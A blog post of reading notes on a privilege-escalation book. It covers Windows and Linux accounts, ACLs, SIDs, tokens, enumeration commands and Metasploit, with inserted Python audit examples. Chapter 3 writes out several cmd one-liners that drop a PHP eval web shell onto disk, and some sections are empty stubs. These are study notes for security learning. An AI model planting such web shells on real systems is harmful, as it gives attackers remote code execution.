[Book] Privilege Escalation - Offensive and Defensive Tactics and Techniques


The book

Introduction

This article is used to keep notes and summaries of the book “Privilege Escalation - Offensive and Defensive Tactics and Techniques”.
The content will be continuously updated as I read through the book.

Reflection

Chapter.1 - Fundamentals

1.2 - Windows Privilege Escalation

Local User And Local Group

cmd:

> net user

User accounts for \\DESKTOP-NKNBEK2

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
sdksdk WDAGUtilityAccount
The command completed successfully.

PowerShell:

PS > Get-LocalUser

Name Enabled Description
---- ------- -----------
Administrator False Built-in account for administering the computer/domain
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
sdksdk True
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...

lusrmgr.msc


> net user <Username> <Password> /add
> net user <Username> /del

Local Group

> net localgroup

Aliases for \\DESKTOP-NKNBEK2

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users
The command completed successfully.

PS > Get-LocalGroup

Name Description
---- -----------
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators Administrators have complete and unrestricted access to the computer/domain
Backup Operators Backup Operators can override security restrictions for the sole purpose of back...
Cryptographic Operators Members are authorized to perform cryptographic operations.
Device Owners Members of this group can change system-wide settings.
Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers Members of this group can read event logs from local machine
Guests Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS Built-in group used by Internet Information Services.
Network Configuration Operators Members in this group can have some administrative privileges to manage configur...
Performance Log Users Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users Members of this group can access performance counter data locally and remotely
Power Users Power Users are included for backwards compatibility and possess limited adminis...
Remote Desktop Users Members in this group are granted the right to logon remotely
Remote Management Users Members of this group can access WMI resources over management protocols (such a...
Replicator Supports file replication in a domain
System Managed Accounts Group Members of this group are managed by the system.
Users Users are prevented from making accidental or intentional system-wide changes an...

Groups worth noting during penetration testing:

  • Administrators
  • Power Users
  • Users
  • Guests
  • TrustedInstaller
  • Authenticated Users

Built-in Accounts

  • Local System:
    Before Windows XP this account had the greatest power: it could modify the file system, the registry, scheduled tasks, Windows Installer, Windows Update, etc. Microsoft later split those rights out; nowadays the account with the greatest power is TrustedInstaller.
  • Local Service
  • Network Service

Useful commands:

| cmd | PowerShell | Description |
| --- | --- | --- |
| net user | Get-LocalUser | View local users. |
| net localgroup | Get-LocalGroup | View local groups. |
| net user <Username> | Get-LocalUser -Name <Username> \| Select-Object * | View a user's properties. |
| net localgroup <Group> | Get-LocalGroupMember -Group <Group> | View the users in a group. |
| net user <Username> <Password> /add | $password = Read-Host -AsSecureString; New-LocalUser <Username> -Password $password | Add a new user. |
| net localgroup <Group> <Username> /add | Add-LocalGroupMember -Group <Group> -Member <Username> | Add a user to a group. |
| net user <Username> /del | Remove-LocalUser -Name <Username> | Delete a user. |
| net user <Username> <Password> | $password = Read-Host -AsSecureString; Set-LocalUser -Name <Username> -Password $password | Change a user's password. |

ACL (Access Control List)

| Term | Meaning |
| --- | --- |
| Security Descriptor | Describes the security information of a securable object: owner SID, group SID, DACL, SACL, etc. |
| Securable Object | An object that carries a security descriptor: file, directory, registry key, process, thread, named pipe, etc. |
| ACL | Access Control List |
| ACE | Access Control Entry |
| DACL | Discretionary Access Control List: the ACEs that grant or deny access. |
| SACL | System Access Control List: the ACEs that control auditing. |
| Trustee | The account, group, or logon session an ACE applies to. |

Security Descriptor

  1. View the SID of the current user:
    > whoami /user
  2. View the SIDs of all users:
    > wmic useraccount get name,sid

A SID has the form S-R-X-Y1-Y2-...-Yn-1-Yn:

  • S: indicates that the string is a Security Identifier (SID).
  • R: the revision level.
  • X: the identifier authority value.
  • Y: a series of subauthority values, where n is the number of values.
    • The first part of the series (-Y1-Y2-...-Yn-1) is the domain identifier. This element of the SID becomes significant in an enterprise with several domains: no two domains in an enterprise share the same domain identifier.
    • The last item in the series (-Yn) is the RID (relative identifier). It distinguishes one account or group from all other accounts and groups in the domain; no two accounts or groups in any domain share the same RID.

Well-known SIDs:

  • Everyone: S-1-1-0
  • BUILTIN\Administrators: S-1-5-32-544, the built-in Administrators group.
  • BUILTIN\Users: S-1-5-32-545, the built-in Users group.
  • NT AUTHORITY\INTERACTIVE: S-1-5-4, users who logged on interactively.
  • NT AUTHORITY\Authenticated Users: S-1-5-11, all authenticated users.
  • LocalService: S-1-5-19
  • NetworkService: S-1-5-20
  • LocalSystem: S-1-5-18
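
The security-descriptor terms above (owner, DACL, ACE, trustee) and the S-R-X-Y layout of a SID can be exercised together on SDDL, the string form in which Windows prints a security descriptor. The following is an added example, not code from the book or from these notes: it splits a SID into revision, authority, domain identifier and RID, resolves the two-letter SDDL trustee aliases to the well-known SIDs listed above, parses the DACL into ACEs, and reports allow ACEs that give write rights to broad trustees such as Everyone or Users. The alias table and right codes are the documented SDDL ones; the two sample descriptors are constructed, and an alias outside the table raises an error rather than being guessed.

```python
import re
from dataclasses import dataclass

# Well-known SIDs from the notes, keyed by the alias SDDL uses for them.
WELL_KNOWN = {
    "WD": ("S-1-1-0", "Everyone"),
    "BA": ("S-1-5-32-544", "BUILTIN\\Administrators"),
    "BU": ("S-1-5-32-545", "BUILTIN\\Users"),
    "IU": ("S-1-5-4", "NT AUTHORITY\\INTERACTIVE"),
    "AU": ("S-1-5-11", "NT AUTHORITY\\Authenticated Users"),
    "LS": ("S-1-5-19", "LocalService"),
    "NS": ("S-1-5-20", "NetworkService"),
    "SY": ("S-1-5-18", "LocalSystem"),
}
NAME_BY_SID = {sid: name for sid, name in WELL_KNOWN.values()}
# SDDL right codes that grant write access (WD/WO here mean WRITE_DAC/WRITE_OWNER).
WRITE_RIGHTS = {"GA", "GW", "FA", "FW", "WD", "WO"}
# Trustees every logged-on user belongs to, so a write grant to them is broad.
LOW_PRIVILEGE = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545", "S-1-5-4"}


@dataclass
class Sid:
    text: str             # the canonical S-R-X-Y1-...-Yn string
    revision: int         # R
    authority: int        # X, the identifier authority
    subauthorities: list  # Y1 .. Yn

    @property
    def domain_identifier(self):  # -Y1-Y2-...-Yn-1
        return self.subauthorities[:-1]

    @property
    def rid(self):                # -Yn
        return self.subauthorities[-1] if self.subauthorities else None


def parse_sid(text):
    """Split 'S-R-X-Y1-...-Yn' into its numeric parts."""
    m = re.fullmatch(r"S-(\d+)-(\d+)((?:-\d+)*)", text)
    if not m:
        raise ValueError("not a SID string: %r" % text)
    return Sid(text, int(m.group(1)), int(m.group(2)), [int(y) for y in m.group(3).split("-") if y])


def resolve_trustee(token):
    """An SDDL trustee field is either a two-letter alias or a literal SID."""
    return parse_sid(WELL_KNOWN[token][0] if token in WELL_KNOWN else token)


@dataclass
class Ace:
    ace_type: str  # A = access allowed, D = access denied, AU = system audit
    flags: str     # inheritance flags such as OI, CI, ID
    rights: list   # two-letter right codes, or ["0x..."] for a raw access mask
    trustee: Sid


def parse_acl(body):
    """'PAI(A;;FA;;;BA)(A;;FR;;;BU)' -> ('PAI', [Ace, Ace])."""
    m = re.fullmatch(r"([A-Z]*)((?:\([^)]*\))*)", body)
    if not m:
        raise ValueError("malformed ACL: %r" % body)
    aces = []
    for inner in re.findall(r"\(([^)]*)\)", m.group(2)):
        ace_type, flags, rights, _obj, _inherit_obj, trustee = inner.split(";")
        codes = [rights] if rights.startswith("0x") else [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append(Ace(ace_type, flags, codes, resolve_trustee(trustee)))
    return m.group(1), aces


def parse_sddl(sddl):
    """Split a descriptor string into owner, group, DACL flags, DACL and SACL."""
    sections = dict(re.findall(r"([OGDS]):(.*?)(?=[OGDS]:|$)", sddl))
    desc = {"owner": None, "group": None, "dacl_flags": "", "dacl": [], "sacl": []}
    if "O" in sections:
        desc["owner"] = resolve_trustee(sections["O"])
    if "G" in sections:
        desc["group"] = resolve_trustee(sections["G"])
    if "D" in sections:
        desc["dacl_flags"], desc["dacl"] = parse_acl(sections["D"])
    if "S" in sections:
        desc["sacl"] = parse_acl(sections["S"])[1]
    return desc


def writable_by_low_privilege(desc):
    """Allow ACEs in the DACL that hand write rights to broad, low-privilege trustees."""
    hits = []
    for ace in desc["dacl"]:
        if ace.ace_type == "A" and ace.trustee.text in LOW_PRIVILEGE:
            granted = sorted(set(ace.rights) & WRITE_RIGHTS)
            if granted:
                hits.append((NAME_BY_SID[ace.trustee.text], granted))
    return hits


# Constructed descriptors for a directory: one tight, one that lets Everyone write.
HARDENED = "O:BAG:SYD:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;FR;;;BU)"
WEAK = "O:BAG:SYD:(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;FRFW;;;WD)"

if __name__ == "__main__":
    for label, sddl in (("hardened", HARDENED), ("weak", WEAK)):
        print(label, "->", writable_by_low_privilege(parse_sddl(sddl)))
```

A real access check walks the DACL in order and honours deny ACEs before allow ACEs; this check only reports allow ACEs, so treat its output as a triage list to confirm with icacls rather than as an authorization decision.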

Authentication

  • winlogon.exe
  • lsass.exe
  • SAM (Security Account Manager): the local account database, stored on disk under System32\config and loaded into the registry under HKEY_LOCAL_MACHINE.

Token

An access token is an object that represents the security context of a process or thread.

A session is created after the user is successfully authenticated and logs in. The Windows system then determines the user’s SID and the SIDs of the groups to which the user belongs. Subsequently, the Local Security Authority (LSA) creates an access token for the user.

An access token contains the user’s SID, group SIDs, session ID, privileges, the default DACL, the token type, and other attributes.

The access token is assigned to userinit.exe, whose path is stored in the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.

userinit.exe is responsible for initializing the user’s environment, such as executing logon scripts, establishing network connections, and launching startup applications. It then reads the value of Shell, which is explorer.exe by default, and launches it as the Windows graphical user interface.

After that, all child processes and threads inherit the access token of their parent process—explorer.exe—unless a process explicitly specifies a different token. Initially, most processes share the same access token.

Tokens come in two types:

  1. Primary Token
  2. Impersonation Token

Separation of Privilege

> whoami /priv
> gpedit.msc
PS> Enable-Privilege -Privilege SeBackupPrivilege

Enable-Privilege and the related commands below are not built-in PowerShell cmdlets; they are provided by a third-party module (PoshPrivilege ships this set) that must be installed first.

| Command | Function |
| --- | --- |
| Enable-Privilege -Privilege <Privilege name> | Enable a privilege |
| Disable-Privilege -Privilege <Privilege name> | Disable a privilege |
| Add-Privilege -Privilege <Privilege name> | Add a privilege |
| Remove-Privilege -Privilege <Privilege name> | Remove a privilege |
| Get-Privilege -CurrentUser | View the privileges of the current user |
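
A token holds every privilege assigned to the account whether whoami /priv shows it as Enabled or Disabled; Disabled only means the process has not enabled it yet, which is exactly what Enable-Privilege changes. The following added example (not from the book or these notes) parses the table whoami /priv prints and compares it with an assumed least-privilege baseline, so that a token carrying an extra privilege such as SeBackupPrivilege stands out during review. The sample output and the baseline set are constructed.

```python
# Constructed output in the layout that whoami /priv prints (not captured from a real host).
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
SeBackupPrivilege             Back up files and directories        Enabled
"""

# Assumed least-privilege baseline for an ordinary interactive user; adapt to your own build.
BASELINE = {
    "SeShutdownPrivilege", "SeChangeNotifyPrivilege", "SeUndockPrivilege",
    "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege",
}


def parse_whoami_priv(text):
    """Map privilege name -> True if its State column reads Enabled, False if Disabled."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):          # the ===== rule marks the start of the rows
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        fields = line.split()
        name, state = fields[0], fields[-1]
        if state not in ("Enabled", "Disabled"):
            raise ValueError("unexpected row: %r" % line)
        privs[name] = state == "Enabled"
    return privs


def compare_to_baseline(privs, baseline=BASELINE):
    """Privileges held beyond the baseline, those already enabled, and baseline ones missing."""
    extra = sorted(set(privs) - baseline)
    return {
        "extra": extra,
        "extra_enabled": [p for p in extra if privs[p]],
        "missing": sorted(baseline - set(privs)),
    }


if __name__ == "__main__":
    report = compare_to_baseline(parse_whoami_priv(SAMPLE))
    for key, names in report.items():
        print("%-14s %s" % (key + ":", ", ".join(names) or "-"))
```

Held-but-disabled privileges belong in the report as much as enabled ones: a process running under that token can enable them itself, so the baseline comparison is made on the full set, and the enabled subset is reported separately.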

Windows Hash

  1. LM Hash
  2. NTLM Hash

UAC

UAC (User Account Control)

Windows Service

Registry

Data type:

  • REG_SZ
  • REG_MULTI_SZ
  • REG_BINARY
  • REG_DWORD

| Hive | Abbreviation | Description |
| --- | --- | --- |
| HKEY_CLASSES_ROOT | HKCR | File associations and COM object registration. |
| HKEY_CURRENT_USER | HKCU | Settings for the currently logged-in user. |
| HKEY_LOCAL_MACHINE | HKLM | System-wide configuration for the entire machine. |
| HKEY_USERS | HKU | All user registry hives currently loaded. |
| HKEY_CURRENT_CONFIG | HKCC | Current hardware profile. |

1.3 - Linux Privilege Escalation

User

  • Root User (Super User)
  • Regular User
  • System User

User Group

User Configuration Files

| File | Meaning |
| --- | --- |
| /etc/passwd | Users and their properties (name, UID, GID, home directory, shell). |
| /etc/shadow | Users' password hashes and password-aging properties. |
| /etc/group | Groups and their properties. |
| /etc/gshadow | Groups' passwords and their properties. |

/etc/passwd

Source: https://infosecwriteups.com/what-is-etc-passwd-group-shadow-file-in-linux-bd7b28f353f3

/etc/shadow

Source: https://linuxopsys.com/etc-shadow-file-explained

/etc/group

Source: https://dpcvirtualtips.com/working-with-local-users-and-groups-on-rhel/

/etc/gshadow

Source: https://ashutoshlinuxnotes.blogspot.com/p/user-and-group-permission.html
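
The four files above are colon-separated records, so a baseline review of local accounts is a small parser plus a handful of checks. The following added example (not from the book or from the linked sources) parses constructed /etc/passwd and /etc/shadow records and reports accounts with UID 0 other than root, an empty password field in /etc/passwd, an empty hash in /etc/shadow combined with a login shell, or no shadow record at all. The field layouts are the standard ones; the sample records and the hash strings are made up.

```python
from dataclasses import dataclass

# Constructed records in the standard 7-field /etc/passwd layout.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:x:0:0:legacy backup:/root:/bin/sh
svc-old::1002:1002:old service:/home/svc-old:/bin/sh
"""

# Constructed records in the standard 9-field /etc/shadow layout
# (the hashes are placeholders, not real crypt(3) output).
SHADOW = """\
root:$6$placeholder$hashA:19800:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
alice:$6$placeholder$hashB:19700:0:99999:7:::
backup2:!:18000:0:99999:7:::
svc-old::19000:0:99999:7:::
"""

NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


@dataclass
class PasswdEntry:
    name: str
    passwd: str   # "x" means the hash lives in /etc/shadow; "" means no password at all
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


@dataclass
class ShadowEntry:
    name: str
    hash: str          # "*" or "!" prefixes mean no valid password / locked
    last_change: int   # days since the epoch, None if unset
    min_days: int
    max_days: int
    warn_days: int


def _int_or_none(field):
    return int(field) if field else None


def _records(text, width):
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != width:
            raise ValueError("expected %d fields: %r" % (width, line))
        yield fields


def parse_passwd(text):
    return {f[0]: PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6])
            for f in _records(text, 7)}


def parse_shadow(text):
    return {f[0]: ShadowEntry(f[0], f[1], _int_or_none(f[2]), _int_or_none(f[3]),
                              _int_or_none(f[4]), _int_or_none(f[5]))
            for f in _records(text, 9)}


def audit(passwd, shadow):
    """Return (account, finding) pairs for the conditions a baseline review checks."""
    findings = []
    for name, p in passwd.items():
        if p.uid == 0 and name != "root":
            findings.append((name, "uid 0 but not root"))
        if p.passwd == "":
            findings.append((name, "empty password field in /etc/passwd"))
        s = shadow.get(name)
        if s is None:
            findings.append((name, "no /etc/shadow record"))
        elif s.hash == "" and p.shell not in NOLOGIN_SHELLS:
            findings.append((name, "empty hash in /etc/shadow with a login shell"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_passwd(PASSWD), parse_shadow(SHADOW)):
        print("%-10s %s" % (account, finding))
```

Running the block prints three findings: backup2 is a second UID 0 account, and svc-old has neither a password field in /etc/passwd nor a hash in /etc/shadow while still having /bin/sh as its shell.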

Chapter.2 - Environment Setup and Tools

2.2 - Kali Linux

Metasploit

> sudo msfconsole
> sudo msfdb status
> sudo msfdb init
msf> db_status
msf> search privilege escalation platform:windows type:exploit

Cobalt Strike

Empire 4

2.3 - PowerShell

2.4 - WinPEAS

2.5 - PowerUp and SharpUp

2.6 - AccessChk

2.7 - cacls and icacls

Chapter.3 - File Action

3.1 - Windows

Create/Write File

  1. cmd
    1. Write file with set:
      set /p=<?php @eval($_POST['hello'])?^><nul>c:\1.php
    2. Write file with echo:
      echo ^<?php @eval($_POST['hello'])?>>c:\2.php
    3. Append with echo:
      echo ok>>c:\2.php
    4. Append without a new line:
      set /p="222">>c:\1.php
    5. Overwrite:
      echo ok>c:\2.php
    6. Write file with echo without a space:
      echo.^<?php @eval($_POST['hello'])?^>>c:\3.php
      echo,^<?php @eval($_POST['hello'])?^>>c:\3.php
    7. Create an empty file:
      cd.>12.txt
      copy nul 12.txt
      type nul>12.txt
      fsutil file createnew c:\12.txt 0
    8. Copy a file:
      type 1.php > ok.php
      copy 1.php ok.php
    9. Move a file:
      move c:\1.txt d:\
  2. PowerShell

Read File

Download File

  1. PowerShell
  2. PHP
  3. Python
  4. VBS
  5. bitsadmin
  6. certutil

Compress/Decompress File

  1. makecab/expand
  2. WinRAR
  3. 7-Zip
  4. BandiZip
  5. PowerShell

3.2 - Linux

Chapter.4 - Windows Information Enumeration

4.1 - Server Information Enumeration

System Version

> ver

Architecture

> wmic os get osarchitecture
> echo %PROCESSOR_ARCHITECTURE%

Service Information

> sc query state=all
> wmic service list brief
PS> Get-WmiObject win32_service | select Name,PathName

Task

> tasklist
> tasklist /svc
> wmic process list brief
PS> ps
PS> Get-WmiObject -Query "select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

Driver Information

> driverquery

Disk Information

> wmic logicaldisk get caption,description,providername
> tree d:\ >C:\tree.txt
> dir /s d:\ >C:\file.txt

Hotfix

> 
PS> 
PS> 

4.2 - Network Information Enumeration

4.3 - User’s Information Enumeration

4.4 - Anti-Virus Information Enumeration

Chapter.5 - Windows Password Action

Chapter.6 - Unsafe Windows System Configuration

Chapter.7 - Windows System Exploitation and Privilege Escalation

Chapter.8 - Linux Information Enumeration